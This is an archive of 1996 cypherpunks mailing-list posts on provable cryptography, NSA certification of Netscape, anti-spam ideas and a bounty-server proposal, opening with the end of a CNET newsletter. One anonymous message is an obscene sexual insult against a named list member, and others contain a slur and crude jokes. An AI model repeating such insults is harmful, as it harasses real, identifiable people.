your war stories. We will publish the best five, and the winners--picked on
a totally subjective basis by our editorial staff--will get supercool CNET
T-shirts. Mail suggestions@news.com, and include the words 'Comdex stories'
in the subject header of your message. To paraphrase the Prez, "Let us feel
yur paynnne..."

   http://www.news.com/Comdex/?nd

*************************************

OH, SO THAT'S WHY O.J. HAS THAT BATTERED COPY OF NEUROMANCER...
As humorist Dave Barry might solemnly intone, "We are not making this up."
Yes, Virginia, hackers did indeed vandalize the O.J. Simpson civil trial
section of AOL's Court TV site. A user reported that when he clicked onto
the particular section, a screen popped up with the words, "This area is
under construction," and, "It's a PIC of OLAF." Such esoteric language puts
this one right up where with Dan Rather's surreal "Kenneth, what is the
frequency" episode...

   http://www.news.com/News/Item/0%2C4%2C5712%2C00.html?nd

*************************************

ANNOUNCEMENTS

AN EASY WAY FOR YOU TO CUSTOMIZE NEWS.COM
So many bits, so little time? Sounds like you need Custom News. Identify the
topics, keywords, or sections you're most interested in, and Custom News
will a create a page of headlines and summaries for all stories that match
your criteria. Check it out at:

http://www.news.com/Personalization/Entry/1%2C21%2C%2C00.html?nocache=1


SEARCH THE SITE FOR PARTICULAR TOPICS AND ARTICLES
Search the entire NEWS.COM database for stories you saw in News Dispatch, or
track any story we've run.

   http://www.news.com/Searching/Entry/0%2C17%2C0%2C00.html?nd


SEND US QUESTIONS, COMMENTS, FLOTSAM, AND JETSAM
If you have any questions, suggestions or remarks, send us a message:

   newsdispatch@cnet.com


HOW TO SUBSCRIBE AND TO UNSUBSCRIBE
To subscribe to News Dispatch: Send mail to listserv@dispatch.cnet.com with
the message:

   subscribe news-dispatch (your name)

in the message body. To unsubscribe send the message:

   unsubscribe news-dispatch


LATE-BREAKING STORIES A CLICK AWAY WITH DESK TOP NEWS
How would you like having split-second access to the very latest news on the
Net? Our Desk Top News feature puts our 20 most recent stories right there
on your desktop for you to review at any time. Here's how it works:

1. From any story, click Desk Top News in the top right.
2. A window will open showing our last 20 stories.
3. Click on a headline to display the story.
4. Desk Top News updates itself every 30 minutes.
5. You become known as Ms./Mr. Cyber-Info. It feels good.

   http://www.news.com/Help/Item/0%2C24%2C12%2C00.html?nd


*************************************

CNET: The Computer Network
   http://www.cnet.com/
   http://www.news.com/
   http://www.gamecenter.com/
   http://www.download.com/
   http://www.search.com/
   http://www.shareware.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 25 Nov 1996 23:01:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Donate your spare cycles to a good cause
Message-ID: <Pine.3.89.9611252228.A24125-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


It's that time of year. Please donate the spare cycles on your Pentium or 
PowerPC to a good cause and help find a new Mersenne prime while you 
sleep. See http://ourworld.compuserve.com/homepages/justforfun/range.htm
for details.

Seriously, folks, what is your PC's CPU doing half the time? I thought so.

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Mon, 25 Nov 1996 23:24:38 -0800 (PST)
To: cracker@icon.co.za
Subject: Re: Symantec's claim.
Message-ID: <3.0.32.19961125232313.0114b81c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:45 PM 11/25/96 +0200, cracker@icon.co.za wrote:

>Anyone come across the pkz300 trojan,if you have it send it please.

Why would you want it?

The PKZ 3.0 trojan is at least 5 years old.  (I am amazed I can still read
the disk my copy is on without the magnetic media flaking off.)  It is a
pretty pathetic trojan at that...

And no, I am not going to send you a copy.  You would use it not for good,
but for evil.  (And not the fun sort of evil either.  That required things
and devices you are far to young to know about...  As well as black leather
clad women with <ahem> ...  Sorry...)

I suggest that you put your inquisitive nature into researching something
that will do you some good.  (Or at least, get you out of the house.)

---
|              "Remember: You can't have BSDM without BSD."              |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Mon, 25 Nov 1996 23:34:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: [GAK] Clipper chip
Message-ID: <199611260734.XAA26037@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim C[rook] May likes to lick the semen-shit mixture that accumulates in the crack
of his mother's ass.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Mon, 25 Nov 1996 10:18:41 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Forming a multinational
Message-ID: <199611252351.XAA00369@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


Hi, 

I am physically located in India and want to start up a  US firm that will operate in India. Basically 
the firm will be a multonational with regional offices in couple of countries, to start with India 
and prolly one somewhere in Europe sometime later. The business involves a tie up with another US firm. 
These people will obviosly require USD payements, while most of the money we'll make will be in Indian 
rupees, since initially we'll be _actually_ operating only in India. 

The problems here are :

x. Can I, an Indian citizen start a US firm? 
x. Is it _legal_ to transfer Rupees funds to our root US firm and buy dollars with it to 
   pay our partners there?
x. Who will sell us USDs? Foreign Exchange offices? Firms like Accu-Rate?
x. What is the tax situation in US for non-citizens?
x. Is US the best place to start such a firm, primary need is to be able to pay dollars to US partner,
   while earning in rupees, without any legal hassles.   

Any help will be appreiciated,

Best,
Vipul

-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul@pobox.com 	          | - Internet & Intranets 
91 11 2233328                     | - Web Development & PERL 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - (Networked) Multimedia





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Checkered Daemon <cdaemon@goblin.punk.net>
Date: Mon, 25 Nov 1996 23:03:35 -0800 (PST)
To: rudd_a@alph.swosu.edu (Amy Rudd)
Subject: Re: public
In-Reply-To: <v01540b01aebf5a364b89@[164.58.41.89]>
Message-ID: <199611260804.AAA01498@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I am new here, and I was wondering, why are there still stupid, immature
> people on line who have the audacity, here in the 90's, to still call
> people a "cocksucking faggot".  

The technical term is "homosexual panic".  It refers to people who have 
grown up being constantly told that they should hate homosexuals, yet
are constantly waking up at 3am from a dream in which they were taking
a nine inch cock up their ass and loving it.

It's related to the fact that most rapists are actually terrified of
women.

As always, consider the source.

-- 
Checkered Daemon                              cdaemon@goblin.punk.net

Delirium:  There must be a word for it ... the thing that lets you know that
           TIME is happening.  IS there a word?
Sandman:   CHANGE.
Delirium:  Oh.  I was AFRAID of that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Tue, 26 Nov 1996 00:13:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Provably "Secure" Crypto
Message-ID: <199611260813.AAA17644@vishnu.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain




The Deviant <deviant@pooh-corner.com> writes: 
> On Mon, 25 Nov 1996, Dana W. Albrecht wrote:
> > Rigorous proofs of the non-existence of an algorithm are not new.  
> > Neither are rigorous proofs that any algorithm which can solve a given 
> > problem requires a minimal running time.  Or, in an even stronger sense, 
> 
> Hrmmm... I seem to see a problem (namely Moore's first law) in assigning
> anything a "minimal running time".  Perhaps "minimal instruction count"
> would be more suited to your example.  Because if you're talking about
> time, it essentially boils down to "the longer something takes the less
> time it takes".
> 
> > that a particular known algorithm for a given problem is indeed a 
> > (provably) optimal algorithm for that problem.
> 
> Never happen.  It just won't.  As a rule, there's _always_ a faster way.

This is just simply not true.  In fact, since you seem to have gracefully
failed to quote the section of my prior post which demonstrates otherwise,
let me re-iterate it:

> > For a (non-cryptographic) example of a proof of the first sort --- that 
> > is, that "there exists no algorithm" --- consider the famous "Halting 
> > Problem" for Turing machines.  (I believe someone else has also 
> > mentioned this.)  There are many proofs such as this one, often related, 
> > though the Halting Problem itself is perhaps the most famous example.
> > 
> > For an (again, non-cryptographic) example of a proof of the second sort 
> > --- that is, that "any algorithm that solves a given problem requires a 
> > minimal running time" --- consider the proof that the "minimal" number 
> > of key comparisons in the worst case required to sort a random list of 
> > elements for which only an ordering relationship is known is O(nlog(n)).  
> > See Knuth, Volume 3, section 5.3.  For a simpler example, a standard 
> > "binary" search which requires O(log(n)) comparisons to find a given 
> > element in the worst case is provably the optimal algorithm for this 
> > task.

Which part of this have you failed to understand?  Look in section 5.3.1
of Volume 3 of "The Art of Computer Programming" by Knuth.  You will find
there a rigorous proof that the "information theoretic lower bound" of
an algorithm which sorts by comparison of keys is O(nlg(n)).

Alternatively, refer to section 6.2.1 of the same book where it is
demonstrated that a binary search by comparison of keys on a sorted list
where no other information is available is an "optimum" algorithm.

If you wish to discuss this further, then you're going to have to directly
address what's widely known and beautifully articulated in Knuth.

> > Turning once again to cryptography, there is presumably an "optimal" 
> > algorithm for factoring a "general" number in the "worst" case.  Of 
> 
> Ok, now I have to pose a question: If cryptographers actually beleive
> this, why continue to search for a faster one.

That's easy.  That an "optimum" factorization algorithm exists does not
mean it is _known_.  Similarly, while one might demonstrate a mathematical
lower bound on the worst-case running times of all possible (known and
unknown) factorization algorithms, this does not mean that an actual
algorithm which runs in this time is known, nor does it even mean that
an actual algorithm which runs in this time even exists.

If you want a completely useless (but easy to prove) lower bound on the
number of operations a factorization algorithm must necessarily have,
I submit to you a trivial one:  1.  Proof of this is left to the reader. :)
Proofs of more interesting lower bounds left to experienced mathematicians.

> > Turning once again to cryptography, there is presumably an "optimal" 
> > algorithm for factoring a "general" number in the "worst" case.  Of 
> > course, known algorithms for factorization seem to regularly improve and 
> > no one has even suggested that any current algorithm is (provably) the 
> > "optimal" algorithm.  Worse case bounds on running time for currently 
> > known algorithms can certainly be produced, but no one currently knows 
> > if these are the best algorithms.
> 
> Again I say, there's _always_ a faster way.

No, there's not.  While no proofs of useful lower bounds on factorization
algorithms are presently known, this does NOT mean that they do not exist.
That such proofs exist for other, simpler algorithms (see above) just
simply refutes this statement.

> > Obviously, discussion on this topic is unrelated to such security 
> > problems as implementation mistakes, fault analysis, outright theft of 
> > keys, etc.  I hope that I've been careful to explain what I mean by 
> > "provably secure" and that it's not interpreted to include these types 
> > of attacks.
> 
> Yes, I must commend you on your amazing tact in asking this incredebly
> irrevelant question.

You're welcome to think it's irrelevant.  I, for one, am glad that people
like Matt Blaze took the trouble to do some work in this area.  I'm also
grateful that this has been pointed out to me in response to my previous
post.  (Thanks to "Mark M." <markm@voicenet.com>)

Dana W. Albrecht
dwa@corsair.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 25 Nov 1996 23:41:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
In-Reply-To: <848946795.108068.0@fatmans.demon.co.uk>
Message-ID: <NJJZXD41w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk writes:
> >It seems to me they're putting an additional layer of stuff ("OTP") between
> >the key generation and the actual encoding, so what's the problem with that,
> >as a concept?
>
> Well for a start it`s not a one time pad because that requires a
> totally real random pad. They have a stream cipher, as for whether it
> is any good or not I would normally not trust a man with the talent
> for bullshit Don Wood has.

I suppose Paul doesn't consider his own ruminations about "brute force attacks
against one-time pads" to be "bullshit".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 25 Nov 1996 23:39:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Provably "Secure" Crypto (was: IPG Algorithm Broken!)
In-Reply-To: <199611252028.MAA16855@vishnu.corsair.com>
Message-ID: <9NJZXD42w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Dana W. Albrecht" <dwa@corsair.com> writes:
> Our friend Don Woods seems to have inadvertently sparked what could be a
> useful and serious discussion regarding "provably secure cryptography."

Sure beats Timmy May's idiotic rants... Don Woods knows much more about
crypto than Timmy May, Paul Bradley, and all other "cypherpunks" combined.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Tue, 26 Nov 1996 00:20:16 -0800 (PST)
To: Tim Tartaglia <tag@silvix.sirinet.net>
Subject: Re: Netscape working with the NSA.
Message-ID: <3.0.32.19961126003002.006e0328@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:34 AM 11/26/96 +0000, Tim Tartaglia wrote:
>
>Check out the following:
>http://www-tradoc.army.mil/dcsim/browser.htm
>
>Here's an excerpt:
>
>> ...Netscape has been working with NSA...Their proposed solution is based
>> on the use of Fortezza card technology.  In November NSA expects to
>> certify Netscape Navigator 3.0 for "unclassified but sensitive" use...

The NSA has two main tasks: gathering [foreign] signals intelligence
("SIGINT") and making it difficult/impossible for other parties to get
signal intelligence from the US ("INFOSEC").

Given the context of the information you found, it looks like they're
negotiating with Netscape and Microsoft to evaluate the strength of their
browsers to that the browsers can be used for "unclassified but sensitive"
tasks; that is to say, NSA is operating in their "protect domestic data"
mode, not their "wiretap everything" mode.

Certifying the browsers (or other domestic privacy tools) as safe if
they're not (or if they've got designed-in weaknesses) would play a very
dangerous game - the NSA would gain little and risk a lot. They could (and
probably do, or will soon) mandate the use of GAK crypto for official
"sensitive" applications; so adding hidden weaknesses (which are
essentially stealth GAK) doesn't give them much they don't have already,
but it does create the potential that a third party will learn of the
hidden weakness (through careful study or exploiting a traitor or whatever)
and then have access to information the gov't would like to keep private
for an unknown period of time - followed by a sudden expensive & disruptive
switch of crypto tools when the discovery of the weakness became known. 

So it seems unlikely that there's anything bad going on here; it doesn't
make much sense for the NSA (or other TLA) to intentionally weaken a crypto
app and then certify it as secure for government use. They want to keep the
good stuff for themselves, and make us use the weak software. They don't
seem to be especially shy about telling us when they want to spy on us. 

I suppose it's possible to see government contracts as a foot in the door
to economic "incentivization", e.g., if Netscape and Microsoft want the
govt's money/approval badly enough, they'll switch over to the dark side.
But this danger is pretty much unavoidable; and the government's got enough
ways to coerce folks (cf. Jim Bidzos and the guys who want to run him over
in the parking lot) that this seems mild by comparison. If the government
chooses to apply some pressure to incentivize a corporation, they'll find a
way. 

So far, it appears that they played fair when they certified DES as secure
- and folks on the outside have been banging away on DES for almost 20
years, without finding any trapdoors. The balance of risks suggests that
they'll probably keep playing fair when certifying privacy tools; not
because they're nice guys, but because it's in their best interests to do so. 

--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Tue, 26 Nov 1996 00:43:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Netscape working with the NSA.
In-Reply-To: <199611260534.FAA14999@silvix.sirinet.net>
Message-ID: <329AADE9.26BF@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim Tartaglia wrote:
> 
> Check out the following:
> http://www-tradoc.army.mil/dcsim/browser.htm

That's very old news. See the cypherpunks archives from almost a full 
year ago; there was an abortive outcry when someone misinterpreted the 
initial press release on this project. Netscape is to support a Fortezza 
security plug-in for military users in addition to, not instead of, 
existing standards.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 25 Nov 1996 23:39:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Another Nutty Idea about SPAM
Message-ID: <199611260706.BAA07407@algebra>
MIME-Version: 1.0
Content-Type: text


Steven Garman wrote:
> I have had yet another twisted idea.  I would be interested in your thoughts.
> 
> Once method of combatting the spammers is to use disinformation.  For example
> we use new addresses for their "remove" lists to check on their honesty.
> 
> What about attacking the lists themselves with false data?  Say you run a site.
> You can make and delete accounts as you please.  So, make a whole bunch of
> new accounts, and submit them by various means to places that will probably 
> use them in bulk e-mail lists.  Then, delete the accounts.  Viola, the lists
> have some worthless addresses.

Another nutty idea: to create a database of people who do NOT want to
receive unsolicited advertisements, and make it widely available.

The obvious problem is that some very uncsrupulous spammers would want
to grab this database and use it as a source of email addresses. 

This problem has a solution, however: instead of distributing people's
email addresses, distribute MD5 checksums of their addresses. For 
example, an entry for ichudov@algebra.com would be 

	b51175dae78f25427351d5e3ff43de30

There is no way to guess the original text from an MD5 checksum.

Spammers should be advised to exclude all addresses with MD5 checksums from
that database from the recipient list, and include instructions on how
to get one added to the database into their spams.

Database maintainers could even provide a email filter-bot that would
accept recipient lists by email and send back the same lists, but
WITHOUT addresses that wish not to receive spam. This way stupid
low-tech spammers (who make up the majority) will be able to process
their email lists quickly and easily.

This database may be maintained centrally. Users may be able to sign up
for inclusion into that database by email or by filling out a Web-based 
form. Identity verifications may be done by using cookie protocol.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 25 Nov 1996 22:09:40 -0800 (PST)
To: Rick Osborne <osborne@gateway.grumman.com>
Subject: [Noise] Re: Need info on non-OS specific random functions (pref C++)
In-Reply-To: <3.0.32.19961125224604.0091fec0@gateway.grumman.com>
Message-ID: <Pine.SUN.3.94.961126010743.28781F-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Nov 1996, Rick Osborne wrote:

> Rick Osborne / osborne@gateway.grumman.com / Northrop Grumman Corporation
> -------------------------------------------------------------------------
> Q: How many surrealists does it take to screw in a lightbulb?
> A: Two.  One to hold the giraffe and the other to fill the bathtub with
> brightly colored machine tools.

The correct answer is:

A fish.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Mon, 25 Nov 1996 22:40:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: An interesting tid-bit
In-Reply-To: <3.0b36.32.19961126133618.006d8e9c@ozemail.com.au>
Message-ID: <199611260640.BAA29851@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mark Neely <accessnt@ozemail.com.au> writes:

> 
> I was just testing out some new search software, and polled Alta Vista to
> see how it all worked. I used "sex" as my search term, and Alta Vista
> reported that their were "no documents matching - sex ignored"!
> 
> Interestingly enough it will let you search with other, sex-related terms
> (such as "nude", "f*ck" etc), but not sex!
> 
> Very bizarre indeed.

This seems to be true of any word that shows up more than a certain
number of times.  For example, I got the same results when searching
for the words "the" and "and".  On the other hand, combination
searches (such as "sex discrimination") seem to work fine.  You can
also use the + operator to limit searches to pages with the word sex.
Thus:

   censorship sex

and

   censorship

are exactly the same search (because sex is ignored), but

   censorship +sex

searches for censorship (initially ignoring sex),
and then turns up only pages which contain the word sex.  Consequently
"+sex" is actually a valid search to find pages which contain the word
sex, but again such a search is not very likely to be useful.

This isn't any kind of censorship attempt on the part of DEC, just a
basic realization that when 8,883,803 web pages contain the word sex,
it doesn't make sense for alta-vista to bother sorting them by date
for you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Mon, 25 Nov 1996 19:00:17 -0800 (PST)
To: John Young <cypherpunks@toad.com>
Subject: Re: DOO_dad
In-Reply-To: <1.5.4.32.19961118140818.0069e60c@pop.pipeline.com>
Message-ID: <199611260300.UAA06630@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

        ah, yeah, the doodads, the big doodads. 

        ...seems like these to ol' 'Nam buddies were hanging off the 
    bars one night when one stops and backs up his scooter to see a 
    billboard:

        "1000 yards ahead. Ruby's Bar. She'll pay you $1,000 
        for every inch your big thang hangs past your doodads!"
    
        Big Mike yells over the roar of the unmuffled engines: "we're
    stopping at Ruby's.  they putt ahead to a roadhouse; behind the
    bar is an attractive woman;  Big Mike says he's on for the ruler;
    she motions him to a back room: "...what ya got?"

        Big Mike slaps his big thang on the table; Ruby whistles with
    lust and asks: "...but where are your doodads"

        unfazed: "Saigon!"


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMppcrr04kQrCC2kFAQFwfAQAuUoMDQMHCEp7kKhqgncikyNdpSqBwM4g
Gd0FNucFqVHu+13U4EwBL/7dDKJgPSePtJTqFBB4M2FMc10FlXqDpjf+E6hmxppP
nHEjE33FXa1hiv00ZavZcfxabfhAiJRT2qZwnOafv6OFEVGPkYLbjBCmrNajRoQl
ruoxcqMri2U=
=I/oP
-----END PGP SIGNATURE-----


--
  without arms they do not resist; 
    without communication they know not what to resist.
        -attila





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 25 Nov 1996 19:45:38 -0800 (PST)
To: "Dana W. Albrecht" <dwa@corsair.com>
Subject: Re: Provably "Secure" Crypto (was: IPG Algorithm Broken!)
In-Reply-To: <199611252028.MAA16855@vishnu.corsair.com>
Message-ID: <Pine.LNX.3.94.961126020057.2424A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 25 Nov 1996, Dana W. Albrecht wrote:

> Our friend Don Woods seems to have inadvertently sparked what could be a 
> useful and serious discussion regarding "provably secure cryptography."
> 
> Not to be confused with the usual "unbreakable" snake oil we see peddled 
> so often, I refer to systems for which rigorous mathematical proof that 
> "there are no shortcuts" exists.  To my knowledge, no such systems, with 
> the exception of a real one-time pad, exist today.  However, I also 

As I have argued many times, that is correct.  OTP, with real random
numbers, and no-reusage, etc, etc, is the only "perfect" cryptosystem, and
even it has its problems (like key exchange, for instance).

> 
> Rigorous proofs of the non-existence of an algorithm are not new.  
> Neither are rigorous proofs that any algorithm which can solve a given 
> problem requires a minimal running time.  Or, in an even stronger sense, 

Hrmmm... I seem to see a problem (namely Moore's first law) in assigning
anything a "minimal running time".  Perhaps "minimal instruction count"
would be more suited to your example.  Because if you're talking about
time, it essentially boils down to "the longer something takes the less
time it takes".

> that a particular known algorithm for a given problem is indeed a 
> (provably) optimal algorithm for that problem.

Never happen.  It just won't.  As a rule, there's _always_ a faster way.

> Turning once again to cryptography, there is presumably an "optimal" 
> algorithm for factoring a "general" number in the "worst" case.  Of 

Ok, now I have to pose a question: If cryptographers actually beleive
this, why continue to search for a faster one.

> course, known algorithms for factorization seem to regularly improve and 
> no one has even suggested that any current algorithm is (provably) the 
> "optimal" algorithm.  Worse case bounds on running time for currently 
> known algorithms can certainly be produced, but no one currently knows 
> if these are the best algorithms.

Again I say, there's _always_ a faster way.

> 
> However, just as one can say, "How do you know that tomorrow some 
> brilliant mathematician will not produce a polynomial time factorization 
> algorithm?" one can also say, "How do you know that tomorrow some 
> brilliant mathematician will not provide a rigorous proof that all 
> factorization algorithms --- in the worse case --- require some 
> specified minimal running time?"

Again I say, it just won't happen.  It can't, and I can't prove that for
the same reasons that it can't happen.

> Obviously, discussion on this topic is unrelated to such security 
> problems as implementation mistakes, fault analysis, outright theft of 
> keys, etc.  I hope that I've been careful to explain what I mean by 
> "provably secure" and that it's not interpreted to include these types 
> of attacks.

Yes, I must commend you on your amazing tact in asking this incredebly
irrevelant question.

> Comments, anyone?
> 
> Dana W. Albrecht
> dwa@corsair.com
> 

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

Unix is the worst operating system; except for all others.
                -- Berry Kercheval


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMppmkTCdEh3oIPAVAQF50wf+J2Gz8P7stqKD4sesCHmWWYNZX1vf2zU0
nBQhkDABuE2fjJnNpUijc13Vls5K6owkL4LeWEHW2mvwCU1tqseRJSUm8m8ckEh1
M/CBu7lJplFj2QYcK+vFvg1+dOpuZycvhROKb0VO6zbB3PTLi9Cc4iJpwIhqDyDG
zCurg4Ccc1cW7I7lTSfeSlRVVqF5FfCTP0GmqS1lcr+NWSPdHIqgZRGHq5n2+nUU
y16ksaIKJMGJ8bzCFb8Q02ii7JUJF3JyYbgsGRWQMHxN+W0mx2E3Crh3+q4ieK/R
ehGnKh4ZjOPY4RRDLQJfuLTvBBccdoKvSimyKHRoybZYIjTra9jYHQ==
=9qjq
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@smoke.suba.com>
Date: Tue, 26 Nov 1996 01:25:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Bounty Server, Revisited.
Message-ID: <199611260942.DAA00413@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



     I have started drafting a proposal statement for the Bounty server. 

     This is where I am at right now. I need as many comments on this 
     as to the way it will work as possible. 

     I am posting this from petro@smoke.suba.com because that is my 
primary account rather than snow, which is only for cypherpunks. Sorry 
for any killfiles this sneaks by. 

     Please reply to snow@smoke.suba.com or the list. Thanks.      

Bounty Server, The proposal:
Version 0.1

Abstract:

     This proposal is an attempt to outline a system for awarding cash 
     payments for the creation of new technologies without the overhead
     or ownership associated with conventional systems such as contract
     or work-for-hire, or employee-employer systems. 

     The objective is to actually bring this system online. 

Background:

     There is a lot of software floating around. It basically falls into
     5 catagories: Commercial, Shareware, Freeware, Gnu (and other 
     "Copyleft" schemes) and Public Domain. 
     <Need to fill this in, but at this point we all know what the 5 types 
     are> 

     It is the "Copylefted" software that interests me at this point. There
     is quite a bit of high quality "Gnu" software, and at least one
     operating system based on the GNU mentality (linux) however there 
     is a dearth of _enduser_ tools such as mail and news readers for 
     the more popular end user operating systems, word processors and 
     graphics editing software, easy to use Graphic Design Software (TeX
     is NOT easy to use) and easy to use Cryptographic software. 

     In order to get these kinds of tools, especially the Cryptographic 
     tools widely deployed, there needs to be a reason for someone to 
     invest the time and effort into polishing the user interfaces and 
     designing them for the average internet user to operate. Figuring
     out new algorythms is fun. Being on the cutting edge, or flipping 
     the bird at Governments is fun. Doing something that has already 
     been done isn't nearly as sexy, yet to deploy the kinds of tools 
     we want _today_ and promote the development of the kings of tools 
     we will want tomorrow, there needs to be some sort of mechanism 
     in place to pay programmers to make these tools. 

     This mechanism (IMO) should be "market" driven, it should allow the 
     community of users to decide which projects should have priority, 
     and which shouldn't. 

     This mechanism should be as flexible as possible. 

     This mechanism should be as simple as possible, and as easy to use as 
     possible. 

     Originally I proposed this to apply to software, but I don't see why 
     it should stop at software. Initally the server will be restricted 
     to software, but I hope that this will work out, and be expanded 
     further. 
     
The proposal:

    What I am going to attempt to do is to set up a "Bounty Server" where 
    someone can iniate a "bounty" on a peice of technology. The initator
    will write up a set of specifications for the technology, and an initial 
    award to be paid to the developer. They then post it on the server and 
    send their initial "bid" to the organization.  

    This is the "bounty". Other people can add to this bounty, allowing the 
    totals to add until someone claims that bounty by providing proof of 
    development to the initiator of the bounty. In software terms they would 
    upload the software to the server and notify the originator of the bounty,
    and the server operators. Other technology will be figured out as it 
    becomes necessary.

    Originally I was going to put the stipulation in that the software written
    must be Copylefted. I decided that that wasn't really necessary, but 
    rather simply desired. To aid in that desire, I am going to build in 
    an initative to releaseing the software "copylefted".

To get more specific: 

    A bounty is considered to be posted when the initial payment is cleared 
    by the bank, and the specifications (discussed later are considered clear 
    enough to avoid interpretation problems.  

    The initial bounty contract gets posted to the WWW server, (possibly) to 
    a "developers list" of interested people, and (possibly) to an 
    appropriate UseNet Newsgroup. 

    Once the bounty is posted, other people can "bid up" or add to the bounty,
    and their contribution will be added to the total bounty as well as their 
    "name" (email address) added to a list of contributors (unless they 
    request not to). The amount they gave will not be listed. It isn't 
    important. At this point contributions and initial bids will be 
    accepted by credit card, check, money order, and possibly ecash 
    (e-cash will be taken at some point, but it really isn't important
    at this point since almost no one uses it.)

    The first developer to upload a _working_ package to the server will 
    be awarded the total bounty, minus "brokerage" fees (discussed later) 
    "First" will be soley determined by the time stamp of the server. As soon
    as the package is uploaded, the initiator and the server adminstrator 
    will be notifed, and the bounty marked "claimed". If the package is 
    accepted by the initiator, the bounty will be marked "closed", the 
    package moved to an FTP site for distribution (if Copylefted) or 
    moved offline if not (archived copies will be kept for legal reasons--
    more on that later). At that point a check for the developer will 
    be cut (or ecash mailed if that works out).   
    
    The Server Adminstrator will also do an cursory check to make sure that
    there are no obvious copyright violations. 

    In the event that there is a conflict between the initiator and the 
    developer, the claim will go into adjudication. The server adminstrators
    decesion is final, and he will make every effort to settle the claim
    fairly. Adjudication will incur an additional fee (see the fees section).  
 
Writing the bounty: 

    The bounty specifications should include the following: 

    1) Target Operating Enviroment (i.e. Operating System for Software, and
       whatever for other technology)

    2) What the desired technology is intended to be used for (i.e. a 
       Word Processor, a Hardware RNG etc, whatever)

    3) Desired Characteristics of the technology--specific features 
       of the technology. It isn't enough to say that you want a 
       word processor, you must specify minimum features you wish this 
